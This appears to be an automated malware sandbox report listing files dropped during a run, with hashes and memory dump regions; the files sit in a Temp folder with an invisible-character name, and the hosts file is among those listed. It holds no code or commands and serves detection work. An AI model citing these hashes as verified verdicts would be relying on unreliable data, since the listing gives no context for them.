50c145d6537fe3b7de2350252b2da93e3aa64ddd888774a7856442595a89c589f550b547c30efcff421edeb3077a6a08845e103bd2e9eb7232b73d7330561938

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Desktop\RestartExit.mp4

Filesize
493KB

MD5
0211ffc055f0b6a705264d2703e8cbce

SHA1
e51654e15707c2484e6bba5439e86a2d29a355ec

SHA256
778d3e18bc7f42fb5ff5887bab7b2b72f368cb311087937b718194ae483a1953

SHA512
7f16cc9bd941219d79d2363d1bc87fff73b340d0182332c384936df5d049d020aa1d368b276121da960ccd600f7063c758d042191c9cb80658af8f4942aa35db

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Desktop\SavePush.xlsx

Filesize
13KB

MD5
4dcb9a3663cf17a53d07a3c8d05a861a

SHA1
f89346250777107e02b635f5d9cf6e4f61ac0e29

SHA256
dc4602b11c152794aa3856169261f56b9c159c88b79ca0d2f62d9b797d3e1de9

SHA512
b31b81ef76aaa23dec92c5aa3f98d8dd554cd1fa8604a5634c4860380dc9ab9ad7be68896d363b4456a4d7aaf8bc186984c806648d57fbecab2e609a449160d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Desktop\SplitMerge.docx

Filesize
467KB

MD5
33a75897088eb66d25111d50d9e0e5a2

SHA1
d6aa9727317b3ebacfac5ba5b9f0ff5948b82cbd

SHA256
ff81f83525c65a31b5bd498e3db9080aa65908e07c3c4bbec00510b8fc997fa7

SHA512
89705f7dbe84c1fd20e3b6ed72c06a00d8dbdfd916f379f7f0117f60a94416b7405354e04e7683359cea1cb5ee7e164932f17cc78edd89c866f36205ee052617

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Documents\InitializeRevoke.docx

Filesize
747KB

MD5
be378117413c7815084e20b695c2b5a7

SHA1
0152bed3f49d05ef070461ca5a402f3509bfef06

SHA256
3af2515028c40783518001c898393b9869bc5563030736055e3fe9aed85b843b

SHA512
5050383f6ec0b9154a1e622712c28f9248e635f918cbc46998bdc89bbe952dda84d28db65e9fed2ccd9c70d017f3af0c86eeb48ab8bf755f5f4f6f0f11426182

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Documents\RepairInitialize.csv

Filesize
1.0MB

MD5
303b37828e61e8b1a6bcffcfd9b41bca

SHA1
ac1ca630a6c8d86ee5da2e1b62375edcdf2f495c

SHA256
5d1ab90f580af92bf14f94ca0754e3c86bf0926d61ba4eff71a1b5ac2f3c9a15

SHA512
fc8d6bc544776dbf47a51c5c854ab3ee574acd8ab20cf2d643b5358502cc925b19639503d7ebac9bf4b3bba8cd28d7777db88c860f1939e3d7092982133e76db

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Downloads\ShowBackup.clr

Filesize
699KB

MD5
d75ef2a5c19eb1a9de1eacbb6349e3d3

SHA1
69c22ba1a746f3a3af9a190d0cc1e21344763cd5

SHA256
6a82518c147f27cdfca95f229b5b2c58c2682af21935213ed76e04b3ef227534

SHA512
b400b47c255487a207b90e64c6748b174c8024fc516c3eef6afc8094f24d52595d74701902593adff1dd890c365a974e505287ff85f3f68e4b5b74b4d79bf26f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Downloads\StepResolve.doc

Filesize
714KB

MD5
207b4200bb8534029740f1c9f09a1e1c

SHA1
e1144144f3b5ee1b081a9690925454830a7ef8bb

SHA256
78dd9cb293800cf3c5f995d298c2b58c1b6a956cc73224a167ea3ea500d6a115

SHA512
2b17d5e2d6969c3b18d3a6c30d3aa78c11eedfbc2b4c17d46ee49f8dcc357684521d2902f84b862e58cce526c69af690d9a90ed3bdb55dd17f011a224c113465

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Downloads\SuspendApprove.txt

Filesize
458KB

MD5
d566a77ab4ca766aac8494623974016b

SHA1
1e616fce173ef0b19790dcf92f4ecf15714fa101

SHA256
e5f489ea74cac29a34d2262e73ced0e4dd2ade7408784ba206bff1a4855708d4

SHA512
4306a5f1a0c3cd38dd18d6c70a30a02b1c4dcfd779be0d7578054e718a05b79f402a1aed50396f1511cc5f8b6ba6fc4c6d7510e3cbca0d4d8e440519250e3a0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‎\Common Files\Music\BlockDisable.mp3

Filesize
306KB

MD5
000cdd6bb4296f19eb96106343f69806

SHA1
ecb8011e669399affe2c83cb14432e6e71de6e76

SHA256
bfe34d771cd63d338e6db7b39e60b96e3d8d9dead33ff5db3e644c98f8fdff4b

SHA512
42544ff9f428efb7a1ba24182be0a33571b5c779cee0e68f7ec5e646dff93dc2628b096c5c9a10c07d4883b9db867aa392ebec644438e075cb4462ab2bbc8fed

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkqnvc0t\CSCFE0001C2CF20494493D003A76A0CD6B.TMP

Filesize
652B

MD5
da1a478e980f1c8a29181ef405784d7e

SHA1
3b7acf100bf3d352fae6bcfbf3d9c0b45af9b280

SHA256
8be6e742a4e96b4943397b8d4baea2d937a90436422694ac69a12e2ee25a8ae7

SHA512
36c31e4d75cccffb4ed76e15a59e7b1fbeda4a0e5d5763d347d289f385382fbbdf606a6bce59ad2fec554d322eaddd38e150ef85d7eab06b187af9122101fb14

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkqnvc0t\kkqnvc0t.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kkqnvc0t\kkqnvc0t.cmdline

Filesize
607B

MD5
ae610e20c92114d227122bfbe4ec1d3a

SHA1
5fc0614352895c95a3b168e79543320c4ffef487

SHA256
4a4b0ce8639650eb4b9f486329f1422b76612feb644811a0fa3aaba40cfd149f

SHA512
647eb65ef11d597abb11f1b015f6499f03cbf7130e8014ea0b6abd244e0bbc14a0450d64fd377ca26e813ce881154831cf60e3f9399b14b0df25eee3870a2e36

Download Submit
memory/1340-93-0x00007FFB66220000-0x00007FFB66CE1000-memory.dmp

Filesize
10.8MB

Download
memory/1340-95-0x00007FFB66220000-0x00007FFB66CE1000-memory.dmp

Filesize
10.8MB

Download
memory/1340-88-0x000001B91B670000-0x000001B91B692000-memory.dmp

Filesize
136KB

Download
memory/1340-82-0x00007FFB66223000-0x00007FFB66225000-memory.dmp

Filesize
8KB

Download
memory/1340-111-0x00007FFB66220000-0x00007FFB66CE1000-memory.dmp

Filesize
10.8MB

Download
memory/2440-214-0x000001D7ACCF0000-0x000001D7ACCF8000-memory.dmp

Filesize
32KB

Download
memory/4448-25-0x00007FFB68080000-0x00007FFB68745000-memory.dmp

Filesize
6.8MB

Download
memory/4448-62-0x00007FFB779B0000-0x00007FFB779C9000-memory.dmp

Filesize
100KB

Download
memory/4448-32-0x00007FFB7B980000-0x00007FFB7B98F000-memory.dmp

Filesize
60KB

Download
memory/4448-31-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp

Filesize
148KB

Download
memory/4448-94-0x00007FFB78320000-0x00007FFB78344000-memory.dmp

Filesize
144KB

Download
memory/4448-71-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp

Filesize
5.2MB

Download
memory/4448-72-0x00000126EF170000-0x00000126EF6A3000-memory.dmp

Filesize
5.2MB

Download
memory/4448-76-0x00007FFB777E0000-0x00007FFB777F4000-memory.dmp

Filesize
80KB

Download
memory/4448-54-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp

Filesize
180KB

Download
memory/4448-283-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp

Filesize
204KB

Download
memory/4448-285-0x00000126EF170000-0x00000126EF6A3000-memory.dmp

Filesize
5.2MB

Download
memory/4448-284-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp

Filesize
5.2MB

Download
memory/4448-287-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp

Filesize
824KB

Download
memory/4448-80-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp

Filesize
180KB

Download
memory/4448-81-0x00007FFB672B0000-0x00007FFB673CA000-memory.dmp

Filesize
1.1MB

Download
memory/4448-78-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp

Filesize
52KB

Download
memory/4448-73-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp

Filesize
148KB

Download
memory/4448-74-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp

Filesize
824KB

Download
memory/4448-70-0x00007FFB68080000-0x00007FFB68745000-memory.dmp

Filesize
6.8MB

Download
memory/4448-65-0x00007FFB78610000-0x00007FFB7861D000-memory.dmp

Filesize
52KB

Download
memory/4448-66-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp

Filesize
204KB

Download
memory/4448-112-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp

Filesize
1.5MB

Download
memory/4448-60-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp

Filesize
1.5MB

Download
memory/4448-56-0x00007FFB78910000-0x00007FFB7892A000-memory.dmp

Filesize
104KB

Download
memory/4448-58-0x00007FFB78320000-0x00007FFB78344000-memory.dmp

Filesize
144KB

Download
memory/4448-303-0x00007FFB68080000-0x00007FFB68745000-memory.dmp

Filesize
6.8MB

Download
memory/4448-309-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp

Filesize
1.5MB

Download
memory/4448-304-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp

Filesize
148KB

Download
memory/4448-362-0x00007FFB67C80000-0x00007FFB67D4E000-memory.dmp

Filesize
824KB

Download
memory/4448-363-0x00007FFB67740000-0x00007FFB67C73000-memory.dmp

Filesize
5.2MB

Download
memory/4448-361-0x00007FFB78610000-0x00007FFB7861D000-memory.dmp

Filesize
52KB

Download
memory/4448-360-0x00007FFB779B0000-0x00007FFB779C9000-memory.dmp

Filesize
100KB

Download
memory/4448-359-0x00007FFB67D50000-0x00007FFB67ECF000-memory.dmp

Filesize
1.5MB

Download
memory/4448-358-0x00007FFB78320000-0x00007FFB78344000-memory.dmp

Filesize
144KB

Download
memory/4448-357-0x00007FFB78910000-0x00007FFB7892A000-memory.dmp

Filesize
104KB

Download
memory/4448-356-0x00007FFB78A00000-0x00007FFB78A2D000-memory.dmp

Filesize
180KB

Download
memory/4448-355-0x00007FFB7B990000-0x00007FFB7B9B5000-memory.dmp

Filesize
148KB

Download
memory/4448-354-0x00007FFB7B980000-0x00007FFB7B98F000-memory.dmp

Filesize
60KB

Download
memory/4448-353-0x00007FFB71A00000-0x00007FFB71A33000-memory.dmp

Filesize
204KB

Download
memory/4448-352-0x00007FFB672B0000-0x00007FFB673CA000-memory.dmp

Filesize
1.1MB

Download
memory/4448-351-0x00007FFB78030000-0x00007FFB7803D000-memory.dmp

Filesize
52KB

Download
memory/4448-350-0x00007FFB777E0000-0x00007FFB777F4000-memory.dmp

Filesize
80KB

Download
memory/4448-338-0x00007FFB68080000-0x00007FFB68745000-memory.dmp

Filesize
6.8MB

Download